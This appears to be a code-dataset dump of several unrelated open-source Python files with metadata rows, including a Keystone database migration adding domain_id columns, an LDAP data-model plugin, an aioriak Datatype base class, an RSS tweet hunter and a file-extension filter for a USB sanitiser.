ubi_args[img_seq] = {}
ini_params[img_seq] = {}
for volume in image.volumes:
ubi_args[img_seq][volume] = {}
ini_params[img_seq][volume] = {}
ini_params[img_seq][volume]['vol_type'] = PRINT_VOL_TYPE_LIST[image.volumes[volume].vol_rec.vol_type]
if image.volumes[volume].vol_rec.flags == UBI_VTBL_AUTORESIZE_FLG:
ini_params[img_seq][volume]['vol_flags'] = 'autoresize'
else:
ini_params[img_seq][volume]['vol_flags'] = image.volumes[volume].vol_rec.flags
ini_params[img_seq][volume]['vol_id'] = image.volumes[volume].vol_id
ini_params[img_seq][volume]['vol_name'] = image.volumes[volume].name.rstrip('\x00')
ini_params[img_seq][volume]['vol_alignment'] = image.volumes[volume].vol_rec.alignment
ini_params[img_seq][volume]['vol_size'] = image.volumes[volume].vol_rec.reserved_pebs * ubi.leb_size
ufsfile = leb_virtual_file(ubi, image.volumes[volume])
uubifs = ubifs(ufsfile)
for key, value in uubifs.superblock_node:
if key == 'key_hash':
value = PRINT_UBIFS_KEY_HASH[value]
elif key == 'default_compr':
value = PRINT_UBIFS_COMPR[value]
if key in ubi_flags:
ubi_args[img_seq][volume][key] = value
for key, value in image.volumes[volume].vol_rec:
if key == 'name':
value = value.rstrip('\x00')
if key in ubi_flags:
ubi_args[img_seq][volume][key] = value
ubi_args[img_seq][volume]['version'] = image.version
ubi_args[img_seq][volume]['vid_hdr_offset'] = image.vid_hdr_offset
ubi_args[img_seq][volume]['sub_page_size'] = ubi_args[img_seq][volume]['vid_hdr_offset']
ubi_args[img_seq][volume]['sub_page_size'] = ubi_args[img_seq][volume]['vid_hdr_offset']
ubi_args[img_seq][volume]['image_seq'] = image.image_seq
ubi_args[img_seq][volume]['peb_size'] = ubi.peb_size
ubi_args[img_seq][volume]['vol_id'] = image.volumes[volume].vol_id
ubi_params[img_seq][volume] = {'flags': ubi_flags,
'args': ubi_args[img_seq][volume],
'ini': ini_params[img_seq][volume]}
return ubi_params
|
gpl-2.0
| 6,523,534,966,752,915,000
| 41.83908
| 113
| 0.543284
| false
| 3.163485
| false
| false
| false
|
DS-CM/live-slides
|
src/GetImage.py
|
1
|
1282
|
import http.client, urllib.request, urllib.parse, urllib.error, base64, json
from pprint import pprint
class GetImage:
def __init__(self, key):
self.key = key
def getImage(self, keywords):
search_string = ""
for x in keywords:
search_string = search_string + " " + x
headers = {
# Request headers
'Ocp-Apim-Subscription-Key': self.key,
}
params = urllib.parse.urlencode({
# Request parameters
'q': search_string,
'count': '1',
'offset': '0',
'mkt': 'en-us',
'safeSearch': 'Strict',
})
try:
conn = http.client.HTTPSConnection('api.cognitive.microsoft.com')
conn.request("GET", "/bing/v5.0/images/search?%s" % params, "{body}", headers)
response = conn.getresponse()
data = json.loads(response.read().decode('utf-8'))
conn.close()
try:
return data['value'][0]['contentUrl']
except IndexError as e:
print("David wants to output this error: {}".format(e))
return None
except Exception as e:
print("[Errno {0}] {1}".format(e.errno, e.strerror))
|
apache-2.0
| 6,372,495,451,247,394,000
| 28.136364
| 90
| 0.513261
| false
| 4.162338
| false
| false
| false
|
paypal/keystone
|
keystone/common/sql/migrate_repo/versions/016_normalize_domain_ids.py
|
1
|
19579
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Normalize for domain_id, i.e. ensure User and Project entities have the
domain_id as a first class attribute.
Both User and Project (as well as Group) entities are owned by a
domain, which is implemented as each having a domain_id foreign key
in their sql representation that points back to the respective
domain in the domain table. This domain_id attribute should also
be required (i.e. not nullable)
Adding a non_nullable foreign key attribute to a table with existing
data causes a few problems since not all DB engines support the
ability to either control the triggering of integrity constraints
or the ability to modify columns after they are created.
To get round the above inconsistencies, two versions of the
upgrade/downgrade functions are supplied, one for those engines
that support dropping columns, and one for those that don't. For
the latter we are forced to do table copy AND control the triggering
of integrity constraints.
"""
import sqlalchemy as sql
from sqlalchemy.orm import sessionmaker
from keystone import config
CONF = config.CONF
DEFAULT_DOMAIN_ID = CONF.identity.default_domain_id
def _disable_foreign_constraints(session, migrate_engine):
if migrate_engine.name == 'mysql':
session.execute('SET foreign_key_checks = 0;')
def _enable_foreign_constraints(session, migrate_engine):
if migrate_engine.name == 'mysql':
session.execute('SET foreign_key_checks = 1;')
def upgrade_user_table_with_copy(meta, migrate_engine, session):
# We want to add the domain_id attribute to the user table. Since
# it is non nullable and the table may have data, easiest way is
# a table copy. Further, in order to keep foreign key constraints
# pointing at the right table, we need to be able and do a table
# DROP then CREATE, rather than ALTERing the name of the table.
# First make a copy of the user table
temp_user_table = sql.Table(
'temp_user',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()),
sql.Column('password', sql.String(128)),
sql.Column('enabled', sql.Boolean, default=True))
temp_user_table.create(migrate_engine, checkfirst=True)
user_table = sql.Table('user', meta, autoload=True)
for user in session.query(user_table):
session.execute('insert into temp_user (id, name, extra, '
'password, enabled) '
'values ( :id, :name, :extra, '
':password, :enabled);',
{'id': user.id,
'name': user.name,
'extra': user.extra,
'password': user.password,
'enabled': user.enabled})
# Now switch off constraints while we drop and then re-create the
# user table, with the additional domain_id column
_disable_foreign_constraints(session, migrate_engine)
session.execute('drop table user;')
# Need to create a new metadata stream since we are going to load a
# different version of the user table
meta2 = sql.MetaData()
meta2.bind = migrate_engine
domain_table = sql.Table('domain', meta2, autoload=True)
user_table = sql.Table(
'user',
meta2,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), nullable=False),
sql.Column('extra', sql.Text()),
sql.Column("password", sql.String(128)),
sql.Column("enabled", sql.Boolean, default=True),
sql.Column('domain_id', sql.String(64), sql.ForeignKey('domain.id'),
nullable=False),
sql.UniqueConstraint('domain_id', 'name'))
user_table.create(migrate_engine, checkfirst=True)
# Finally copy in the data from our temp table and then clean
# up by deleting our temp table
for user in session.query(temp_user_table):
session.execute('insert into user (id, name, extra, '
'password, enabled, domain_id) '
'values ( :id, :name, :extra, '
':password, :enabled, :domain_id);',
{'id': user.id,
'name': user.name,
'extra': user.extra,
'password': user.password,
'enabled': user.enabled,
'domain_id': DEFAULT_DOMAIN_ID})
_enable_foreign_constraints(session, migrate_engine)
session.execute('drop table temp_user;')
def upgrade_project_table_with_copy(meta, migrate_engine, session):
# We want to add the domain_id attribute to the project table. Since
# it is non nullable and the table may have data, easiest way is
# a table copy. Further, in order to keep foreign key constraints
# pointing at the right table, we need to be able and do a table
# DROP then CREATE, rather than ALTERing the name of the table.
# Fist make a copy of the project table
temp_project_table = sql.Table(
'temp_project',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()),
sql.Column('description', sql.Text()),
sql.Column('enabled', sql.Boolean, default=True))
temp_project_table.create(migrate_engine, checkfirst=True)
project_table = sql.Table('project', meta, autoload=True)
for project in session.query(project_table):
session.execute('insert into temp_project (id, name, extra, '
'description, enabled) '
'values ( :id, :name, :extra, '
':description, :enabled);',
{'id': project.id,
'name': project.name,
'extra': project.extra,
'description': project.description,
'enabled': project.enabled})
# Now switch off constraints while we drop and then re-create the
# project table, with the additional domain_id column
_disable_foreign_constraints(session, migrate_engine)
session.execute('drop table project;')
# Need to create a new metadata stream since we are going to load a
# different version of the project table
meta2 = sql.MetaData()
meta2.bind = migrate_engine
domain_table = sql.Table('domain', meta2, autoload=True)
project_table = sql.Table(
'project',
meta2,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), nullable=False),
sql.Column('extra', sql.Text()),
sql.Column('description', sql.Text()),
sql.Column('enabled', sql.Boolean, default=True),
sql.Column('domain_id', sql.String(64), sql.ForeignKey('domain.id'),
nullable=False),
sql.UniqueConstraint('domain_id', 'name'))
project_table.create(migrate_engine, checkfirst=True)
# Finally copy in the data from our temp table and then clean
# up by deleting our temp table
for project in session.query(temp_project_table):
session.execute('insert into project (id, name, extra, '
'description, enabled, domain_id) '
'values ( :id, :name, :extra, '
':description, :enabled, :domain_id);',
{'id': project.id,
'name': project.name,
'extra': project.extra,
'description': project.description,
'enabled': project.enabled,
'domain_id': DEFAULT_DOMAIN_ID})
_enable_foreign_constraints(session, migrate_engine)
session.execute('drop table temp_project;')
def downgrade_user_table_with_copy(meta, migrate_engine, session):
# For engines that don't support dropping columns, we need to do this
# as a table copy. Further, in order to keep foreign key constraints
# pointing at the right table, we need to be able and do a table
# DROP then CREATE, rather than ALTERing the name of the table.
# Fist make a copy of the user table
temp_user_table = sql.Table(
'temp_user',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('password', sql.String(128)),
sql.Column('enabled', sql.Boolean, default=True),
sql.Column('extra', sql.Text()))
temp_user_table.create(migrate_engine, checkfirst=True)
user_table = sql.Table('user', meta, autoload=True)
for user in session.query(user_table):
session.execute('insert into temp_user (id, name, '
'password, enabled, extra) '
'values ( :id, :name, '
':password, :enabled, :extra);',
{'id': user.id,
'name': user.name,
'password': user.password,
'enabled': user.enabled,
'extra': user.extra})
# Now switch off constraints while we drop and then re-create the
# user table, less the columns we wanted to drop
_disable_foreign_constraints(session, migrate_engine)
session.execute('drop table user;')
# Need to create a new metadata stream since we are going to load a
# different version of the user table
meta2 = sql.MetaData()
meta2.bind = migrate_engine
user_table = sql.Table(
'user',
meta2,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()),
sql.Column('password', sql.String(128)),
sql.Column('enabled', sql.Boolean, default=True))
user_table.create(migrate_engine, checkfirst=True)
_enable_foreign_constraints(session, migrate_engine)
# Finally copy in the data from our temp table and then clean
# up by deleting our temp table
for user in session.query(temp_user_table):
session.execute('insert into user (id, name, extra, '
'password, enabled) '
'values ( :id, :name, :extra, '
':password, :enabled);',
{'id': user.id,
'name': user.name,
'extra': user.extra,
'password': user.password,
'enabled': user.enabled})
session.execute('drop table temp_user;')
def downgrade_project_table_with_copy(meta, migrate_engine, session):
# For engines that don't support dropping columns, we need to do this
# as a table copy. Further, in order to keep foreign key constraints
# pointing at the right table, we need to be able and do a table
# DROP then CREATE, rather than ALTERing the name of the table.
# Fist make a copy of the project table
temp_project_table = sql.Table(
'temp_project',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('description', sql.Text()),
sql.Column('enabled', sql.Boolean, default=True),
sql.Column('extra', sql.Text()))
temp_project_table.create(migrate_engine, checkfirst=True)
project_table = sql.Table('project', meta, autoload=True)
for project in session.query(project_table):
session.execute('insert into temp_project (id, name, '
'description, enabled, extra) '
'values ( :id, :name, '
':description, :enabled, :extra);',
{'id': project.id,
'name': project.name,
'description': project.description,
'enabled': project.enabled,
'extra': project.extra})
# Now switch off constraints while we drop and then re-create the
# project table, less the columns we wanted to drop
_disable_foreign_constraints(session, migrate_engine)
session.execute('drop table project;')
# Need to create a new metadata stream since we are going to load a
# different version of the project table
meta2 = sql.MetaData()
meta2.bind = migrate_engine
project_table = sql.Table(
'project',
meta2,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(64), unique=True, nullable=False),
sql.Column('extra', sql.Text()),
sql.Column('description', sql.Text()),
sql.Column('enabled', sql.Boolean, default=True))
project_table.create(migrate_engine, checkfirst=True)
_enable_foreign_constraints(session, migrate_engine)
# Finally copy in the data from our temp table and then clean
# up by deleting our temp table
for project in session.query(temp_project_table):
session.execute('insert into project (id, name, extra, '
'description, enabled) '
'values ( :id, :name, :extra, '
':description, :enabled);',
{'id': project.id,
'name': project.name,
'extra': project.extra,
'description': project.description,
'enabled': project.enabled})
session.execute("drop table temp_project;")
def upgrade_user_table_with_col_create(meta, migrate_engine, session):
# Create the domain_id column. We want this to be not nullable
# but also a foreign key. We can't create this right off the
# bat since any existing rows would cause an Integrity Error.
# We therefore create it nullable, fill the column with the
# default data and then set it to non nullable.
domain_table = sql.Table('domain', meta, autoload=True)
user_table = sql.Table('user', meta, autoload=True)
user_table.create_column(
sql.Column('domain_id', sql.String(64),
sql.ForeignKey('domain.id'), nullable=True))
for user in session.query(user_table).all():
values = {'domain_id': DEFAULT_DOMAIN_ID}
update = user_table.update().\
where(user_table.c.id == user.id).\
values(values)
migrate_engine.execute(update)
# Need to commit this or setting nullable to False will fail
session.commit()
user_table.columns.domain_id.alter(nullable=False)
# Finally, change the uniqueness settings for the name attribute
session.execute('ALTER TABLE "user" DROP CONSTRAINT user_name_key;')
session.execute('ALTER TABLE "user" ADD CONSTRAINT user_dom_name_unique '
'UNIQUE (domain_id, name);')
def upgrade_project_table_with_col_create(meta, migrate_engine, session):
# Create the domain_id column. We want this to be not nullable
# but also a foreign key. We can't create this right off the
# bat since any existing rows would cause an Integrity Error.
# We therefore create it nullable, fill the column with the
# default data and then set it to non nullable.
domain_table = sql.Table('domain', meta, autoload=True)
project_table = sql.Table('project', meta, autoload=True)
project_table.create_column(
sql.Column('domain_id', sql.String(64),
sql.ForeignKey('domain.id'), nullable=True))
for project in session.query(project_table).all():
values = {'domain_id': DEFAULT_DOMAIN_ID}
update = project_table.update().\
where(project_table.c.id == project.id).\
values(values)
migrate_engine.execute(update)
# Need to commit this or setting nullable to False will fail
session.commit()
project_table.columns.domain_id.alter(nullable=False)
# Finally, change the uniqueness settings for the name attribute
session.execute('ALTER TABLE project DROP CONSTRAINT tenant_name_key;')
session.execute('ALTER TABLE project ADD CONSTRAINT proj_dom_name_unique '
'UNIQUE (domain_id, name);')
def downgrade_user_table_with_col_drop(meta, migrate_engine, session):
# Revert uniqueness settings for the name attribute
session.execute('ALTER TABLE "user" DROP CONSTRAINT '
'user_dom_name_unique;')
session.execute('ALTER TABLE "user" ADD UNIQUE (name);')
session.commit()
# And now go ahead an drop the domain_id column
domain_table = sql.Table('domain', meta, autoload=True)
user_table = sql.Table('user', meta, autoload=True)
column = sql.Column('domain_id', sql.String(64),
sql.ForeignKey('domain.id'), nullable=False)
column.drop(user_table)
def downgrade_project_table_with_col_drop(meta, migrate_engine, session):
# Revert uniqueness settings for the name attribute
session.execute('ALTER TABLE project DROP CONSTRAINT '
'proj_dom_name_unique;')
session.execute('ALTER TABLE project ADD CONSTRAINT tenant_name_key '
'UNIQUE (name);')
session.commit()
# And now go ahead an drop the domain_id column
domain_table = sql.Table('domain', meta, autoload=True)
project_table = sql.Table('project', meta, autoload=True)
column = sql.Column('domain_id', sql.String(64),
sql.ForeignKey('domain.id'), nullable=False)
column.drop(project_table)
def upgrade(migrate_engine):
meta = sql.MetaData()
meta.bind = migrate_engine
session = sessionmaker(bind=migrate_engine)()
if migrate_engine.name in ['sqlite', 'mysql']:
upgrade_user_table_with_copy(meta, migrate_engine, session)
upgrade_project_table_with_copy(meta, migrate_engine, session)
else:
upgrade_user_table_with_col_create(meta, migrate_engine, session)
upgrade_project_table_with_col_create(meta, migrate_engine, session)
session.commit()
session.close()
def downgrade(migrate_engine):
meta = sql.MetaData()
meta.bind = migrate_engine
session = sessionmaker(bind=migrate_engine)()
if migrate_engine.name in ['sqlite', 'mysql']:
downgrade_user_table_with_copy(meta, migrate_engine, session)
downgrade_project_table_with_copy(meta, migrate_engine, session)
else:
# MySQL should in theory be able to use this path, but seems to
# have problems dropping columns which are foreign keys
downgrade_user_table_with_col_drop(meta, migrate_engine, session)
downgrade_project_table_with_col_drop(meta, migrate_engine, session)
session.commit()
session.close()
|
apache-2.0
| 4,975,266,049,065,287,000
| 44.21709
| 78
| 0.623117
| false
| 4.145458
| false
| false
| false
|
hpc/hypnotoad
|
hypnotoad/plugins/datamodels/ldap/ldap_plugin.py
|
1
|
3400
|
#
# An ldap data model plugin for hypnotoad.
#
import ldap
import logging
from hypnotoad.core import plugin
LOG = logging.getLogger('root')
class ldap_plugin(plugin.data_model_plugin):
def setup(self, config, model_version):
"""Called before the plugin is asked to do anything."""
if config.getboolean('Data Model Options', 'ldap_plugin_enabled'):
self.plugin_enabled = True
LOG.debug("LDAP plugin enabled")
ldap_url = config.get('Data Model Options', 'ldap_server')
ldap_dc = config.get('Data Model Options', 'ldap_dc')
ldap_ou_group = config.get('Data Model Options', 'ldap_ou_group')
ldap_ou_user = config.get('Data Model Options', 'ldap_ou_user')
ldap_timeout = config.getfloat(
'Data Model Options', 'ldap_timeout')
self.ldap_dn_user = "ou=" + ldap_ou_user + "," + ldap_dc
self.ldap_dn_group = "ou=" + ldap_ou_group + "," + ldap_dc
LOG.debug("URL: " + ldap_url)
LOG.debug("Base DC: " + ldap_dc)
LOG.debug("DN for groups: " + self.ldap_dn_group)
LOG.debug("DN for users: " + self.ldap_dn_user)
self.ldap_ctx = ldap.initialize(ldap_url)
self.ldap_ctx.set_option(ldap.OPT_NETWORK_TIMEOUT, ldap_timeout)
self.config = config
self.model_version = model_version
else:
self.plugin_enabled = False
def teardown(self):
"""Called to allow the plugin to free anything."""
if self.plugin_enabled:
LOG.debug("Got to ldap plugin teardown")
self.ldap_ctx.unbind_s()
def get_model(self):
"""Look up information in this data model."""
model = []
if self.plugin_enabled:
LOG.debug("Got to ldap plugin get_model")
model.append(
{'little_lang_entry': {'version': self.model_version}})
def ldap_search(dn, attrs):
return self.ldap_ctx.search_s(dn, ldap.SCOPE_SUBTREE, '(cn=*)', attrs)
users = ldap_search(self.ldap_dn_user, [
'cn', 'gidNumber', 'homeDirectory', 'uid',
'uidNumber', 'gecos', 'hpcDRMadef', 'loginShell'
])
LOG.debug("Found " + str(len(users)) + " users.")
for u in users:
dn, attrs = u
model.append({'user_entry': {
'short_name_string': attrs['uid'][0],
'full_name_string': attrs['cn'][0],
'group_id_integer': attrs['gidNumber'][0],
'user_id_integer': attrs['uidNumber'][0],
'home_directory_string': attrs['homeDirectory'][0],
'login_shell_string': attrs['loginShell'][0],
'priority_fairshare_float': '',
'priority_qos_name_array': ''
}})
groups = ldap_search(
self.ldap_dn_group, ['cn', 'hpcDRMshare', 'memberUid'])
for g in groups:
dn, attrs = g
LOG.debug("Found group with DN: " + dn)
model.append({'group_entry': {
'short_name_string': attrs['cn'][0],
'priority_fairshare_float': attrs['hpcDRMshare'][0],
}})
return model
# EOF
|
bsd-3-clause
| 450,297,542,380,948,160
| 32.333333
| 86
| 0.519412
| false
| 3.944316
| true
| false
| false
|
hanelsofterp/green-hanel
|
purchase_landed_cost_assigning_before_receiving/wizard/wizard_import.py
|
1
|
1127
|
__author__ = 'trananhdung'
from openerp import models, fields, api
class extendPickingImportWizard(models.TransientModel):
_inherit = 'picking.import.wizard'
pickings = fields.Many2many(
comodel_name='stock.picking',
relation='distribution_import_picking_rel', column1='wizard_id',
column2='picking_id', string='Incoming shipments',
domain="[('partner_id', 'child_of', supplier),"
"('location_id.usage', '=', 'supplier'),"
"('id', 'not in', prev_pickings[0][2]),"
"('state', 'in', ('landed_cost','done'))]", required=True)
@api.multi
def action_import_picking(self):
self.ensure_one()
# for picking in self.pickings:
# for move in picking.move_lines:
# self.env['purchase.cost.distribution.line'].create(
# self._prepare_distribution_line(move))
self.pickings.write({
'distribution_id': self.env.context.get('active_id', False)
})
return super(extendPickingImportWizard, self).action_import_picking()
|
gpl-3.0
| 947,077,968,450,730,200
| 38.25
| 77
| 0.582076
| false
| 3.899654
| false
| false
| false
|
rambler-digital-solutions/aioriak
|
aioriak/datatypes/datatype.py
|
1
|
4884
|
from . import TYPES
from aioriak.error import ContextRequired
class Datatype:
'''
Base class for all convergent datatype wrappers. You will not use
this class directly, but it does define some methods are common to
all datatype wrappers.
'''
#: The string "name" of this datatype. Each datatype should set this.
type_name = None
def __init__(self, bucket=None, key=None, value=None, context=None):
self.bucket = bucket
self.key = key
self._context = context
if value is not None:
self._set_value(value)
else:
self._set_value(self._default_value())
self._post_init()
@property
def value(self):
'''
The pure, immutable value of this datatype, as a Python value,
which is unique for each datatype.
**NB**: Do not use this property to mutate data, as it will not
have any effect. Use the methods of the individual type to effect
changes. This value is guaranteed to be independent of any internal
data representation.
'''
return self._value
@property
def context(self):
'''
The opaque context for this type, if it was previously fetched.
:rtype: str
'''
if self._context:
return self._context[:]
@property
def modified(self):
'''
Whether this datatype has staged local modifications.
:rtype: bool
'''
raise NotImplementedError
# Lifecycle methods
async def reload(self, **params):
'''
Reloads the datatype from Riak.
.. warning: This clears any local modifications you might have
made.
:rtype: :class:`Datatype`
'''
if not self.bucket:
raise ValueError('bucket property not assigned')
if not self.key:
raise ValueError('key property not assigned')
dtype, value, context = await self.bucket._client._fetch_datatype(
self.bucket, self.key, **params)
if not dtype == self.type_name:
raise TypeError("Expected datatype {} but "
"got datatype {}".format(self.__class__,
TYPES[dtype]))
self.clear()
self._context = context
self._set_value(value)
return self
async def delete(self, **params):
'''
Deletes the datatype from Riak. See :meth:`RiakClient.delete()
<aioriak.client.RiakClient.delete>` for options.
'''
self.clear()
self._context = None
self._set_value(self._default_value())
await self.bucket._client.delete(self, **params)
return self
async def update(self, **params):
'''
Sends locally staged mutations to Riak.
:rtype: a subclass of :class:`~aioriak.datatypes.Datatype`
'''
if not self.modified:
raise ValueError("No operation to perform")
params.setdefault('return_body', True)
await self.bucket._client.update_datatype(self, **params)
self.clear()
return self
store = update
def clear(self):
'''
Removes all locally staged mutations.
'''
self._post_init()
def to_op(self):
'''
Extracts the mutation operation from this datatype, if any.
Each type must implement this method, returning the
appropriate operation, or `None` if there is no queued
mutation.
'''
raise NotImplementedError
# Private stuff
def _set_value(self, value):
self._raise_if_badtype(value)
self._value = self._coerce_value(value)
def _raise_if_badtype(self, new_value):
if not self._check_type(new_value):
raise TypeError(self._type_error_msg)
def _check_type(self, new_value):
'''
Checks that initial values of the type are appropriate. Each
type must implement this method.
:rtype: bool
'''
raise NotImplementedError
def _default_value(self):
'''
Returns what the initial value of an empty datatype should be.
'''
raise NotImplementedError
def _coerce_value(self, new_value):
'''
Coerces the input value into the internal representation for
the type. Datatypes may override this method.
'''
return new_value
def _post_init(self):
'''
Called at the end of :meth:`__init__` so that subclasses can tweak
their own setup without overriding the constructor.
'''
pass
def _require_context(self):
'''
Raises an exception if the context is not present
'''
if not self._context:
raise ContextRequired()
|
mit
| -50,095,760,985,934,680
| 27.231214
| 75
| 0.577805
| false
| 4.620624
| false
| false
| false
|
nschaetti/pyTweetBot
|
pyTweetBot/tweet/RSSHunter.py
|
1
|
2080
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
import feedparser
from .Hunter import Hunter
from .Tweet import Tweet
import logging
from textblob import TextBlob
# Find new tweets from RSS streams
class RSSHunter(Hunter):
"""
Find new tweets from RSS streams
"""
# Constructor
def __init__(self, stream):
self._stream = stream
self._stream_url = stream['url']
logging.debug(u"Retreiving RSS stream {}".format(self._stream_url))
self._entries = feedparser.parse(self._stream_url)['entries']
self._hashtags = stream['hashtags'] if 'hashtags' in stream else list()
self._lang = stream['lang']
self._current = 0
# end __init__
# Get stream
def get_stream(self):
"""
Get stream
"""
return self._stream
# end get_stream
# To unicode
def __unicode__(self):
"""
To unicode
:return:
"""
return u"RSSHunter(stream={})".format(self._stream)
# end __unicode__
# Iterator
def __iter__(self):
"""
Iterator
:return:
"""
return self
# end __iter__
# Next
def next(self):
"""
Next
:return:
"""
if self._current >= len(self._entries):
raise StopIteration
# end if
# Found
found = False
while not found and self._current < len(self._entries):
# Get current entry
current_entry = self._entries[self._current]
# Analyze text
tweet_blob = TextBlob(current_entry['title'])
# Right language
if tweet_blob.detect_language() in self._lang:
found = True
# end if
# Next
self._current += 1
# end while
# Tweet generator
if found:
return Tweet(current_entry['title'], current_entry['links'][0]['href'], self._hashtags)
else:
raise StopIteration
# end if
# end next
# end RSSHunter
|
gpl-3.0
| -6,919,431,503,497,942,000
| 21.608696
| 99
| 0.522115
| false
| 4.262295
| false
| false
| false
|
Dymaxion00/KittenGroomer
|
fs/opt/groomer/functions_pier9.py
|
1
|
2525
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from helpers import FileBase, KittenGroomerBase, main
printers = ['.STL', '.obj']
cnc = ['.nc', '.tap', '.gcode', '.dxf', '.stl', '.obj', '.iges', '.igs',
'.vrml', '.vrl', '.thing', '.step', '.stp', '.x3d']
shopbot = ['.ai', '.svg', '.dxf', '.dwg', '.eps']
omax = ['.ai', '.svg', '.dxf', '.dwg', '.eps', '.omx', '.obj']
epilog_laser = ['.ai', '.svg', '.dxf', '.dwg', '.eps']
metabeam = ['.dxf']
up = ['.upp', '.up3', '.stl', '.obj']
class FilePier9(FileBase):
def __init__(self, src_path, dst_path):
''' Init file object, set the extension '''
super(FilePier9, self).__init__(src_path, dst_path)
a, self.extension = os.path.splitext(self.src_path)
class KittenGroomerPier9(KittenGroomerBase):
def __init__(self, root_src=None, root_dst=None):
'''
Initialize the basics of the copy
'''
if root_src is None:
root_src = os.path.join(os.sep, 'media', 'src')
if root_dst is None:
root_dst = os.path.join(os.sep, 'media', 'dst')
super(KittenGroomerPier9, self).__init__(root_src, root_dst)
# The initial version will accept all the file extension for all the machines.
self.authorized_extensions = printers + cnc + shopbot + omax + epilog_laser + metabeam + up
def _print_log(self):
'''
Print the logs related to the current file being processed
'''
tmp_log = self.log_name.fields(**self.cur_file.log_details)
if not self.cur_file.log_details.get('valid'):
tmp_log.warning(self.cur_file.log_string)
else:
tmp_log.debug(self.cur_file.log_string)
def processdir(self):
'''
Main function doing the processing
'''
for srcpath in self._list_all_files(self.src_root_dir):
self.log_name.info('Processing {}', srcpath.replace(self.src_root_dir + '/', ''))
self.cur_file = FilePier9(srcpath, srcpath.replace(self.src_root_dir, self.dst_root_dir))
if self.cur_file.extension in self.authorized_extensions:
self.cur_file.add_log_details('valid', True)
self.cur_file.log_string = 'Expected extension: ' + self.cur_file.extension
self._safe_copy()
else:
self.cur_file.log_string = 'Bad extension: ' + self.cur_file.extension
self._print_log()
if __name__ == '__main__':
main(KittenGroomerPier9)
|
bsd-3-clause
| 8,387,122,660,357,544,000
| 36.132353
| 101
| 0.565149
| false
| 3.216561
| false
| false
| false
|
zqfan/leetcode
|
algorithms/227. Basic Calculator II/solution.py
|
1
|
1095
|
class Solution(object):
def calculate(self, s):
"""
:type s: str
:rtype: int
"""
queue = collections.deque()
method = {
"+": operator.add,
"-": operator.sub,
"*": operator.mul,
"/": operator.div
}
pri = {
operator.add: 0,
operator.sub: 0,
operator.mul: 1,
operator.div: 1
}
i = 0; n = 0
while i < len(s):
if s[i].isdigit():
n = n * 10 + int(s[i])
elif s[i] in method:
while queue and pri[method[s[i]]] <= pri[queue[-1]]:
op = queue.pop()
n1 = queue.pop()
n = op(n1, n)
queue.append(n)
queue.append(method[s[i]])
n = 0
i += 1
queue.append(n)
while len(queue) >= 3:
n1 = queue.pop()
op = queue.pop()
n2 = queue.pop()
queue.append(op(n2, n1))
return queue.pop()
|
gpl-3.0
| 8,992,052,370,713,019,000
| 27.076923
| 68
| 0.368037
| false
| 3.99635
| false
| false
| false
|
RaghavPro/Runescape-Hiscores
|
hiscores/forms.py
|
1
|
2377
|
from django import forms
from django.core.exceptions import FieldError
from .models import Skills
class SearchForm(forms.Form):
search = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Username', 'required': ''}),
max_length=12, label=False)
def clean_search(self):
search = self.cleaned_data['search']
try:
Skills.objects.get(user_name__iexact=search)
except Skills.DoesNotExist:
raise forms.ValidationError("Player does not exist.")
class CompareForm(forms.Form):
player1 = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Username', 'required': ''}),
max_length=12, label=False)
player2 = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Username', 'required': ''}),
max_length=12, label=False)
def clean_player1(self):
player1 = self.cleaned_data['player1']
try:
Skills.objects.get(user_name__iexact=player1)
except Skills.DoesNotExist:
raise forms.ValidationError("Player does not exist.")
return player1
def clean_player2(self):
player2 = self.cleaned_data['player2']
try:
Skills.objects.get(user_name__iexact=player2)
except Skills.DoesNotExist:
raise forms.ValidationError("Player does not exist.")
return player2
class SearchRankForm(forms.Form):
search_rank = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Rank', 'required': ''}),
max_length=30, label=False)
skill_exp = forms.CharField(widget=forms.HiddenInput())
def clean_search_rank(self):
rank = self.cleaned_data['search_rank']
skill_exp = self.data['skill_exp']
try:
rank = max(int(rank), 1) # Take to first rank if negative
user_name = Skills.objects.order_by("-%s" % skill_exp).values("user_name")[rank - 1]['user_name']
except IndexError:
raise forms.ValidationError("That rank does not exist.")
except FieldError:
raise forms.ValidationError("Oops, please try again.")
except ValueError:
raise forms.ValidationError("Enter a valid number.")
return user_name
|
gpl-2.0
| 856,744,986,639,875,300
| 36.730159
| 109
| 0.63231
| false
| 4.063248
| false
| false
| false
|
kevinr/750book-web
|
750book-web-env/lib/python2.7/site-packages/kombu/transport/beanstalk.py
|
1
|
3295
|
"""
kombu.transport.beanstalk
=========================
Beanstalk transport.
:copyright: (c) 2010 - 2012 by David Ziegler.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import socket
from Queue import Empty
from anyjson import loads, dumps
from beanstalkc import Connection, BeanstalkcException, SocketError
from . import virtual
from ..exceptions import StdChannelError
DEFAULT_PORT = 11300
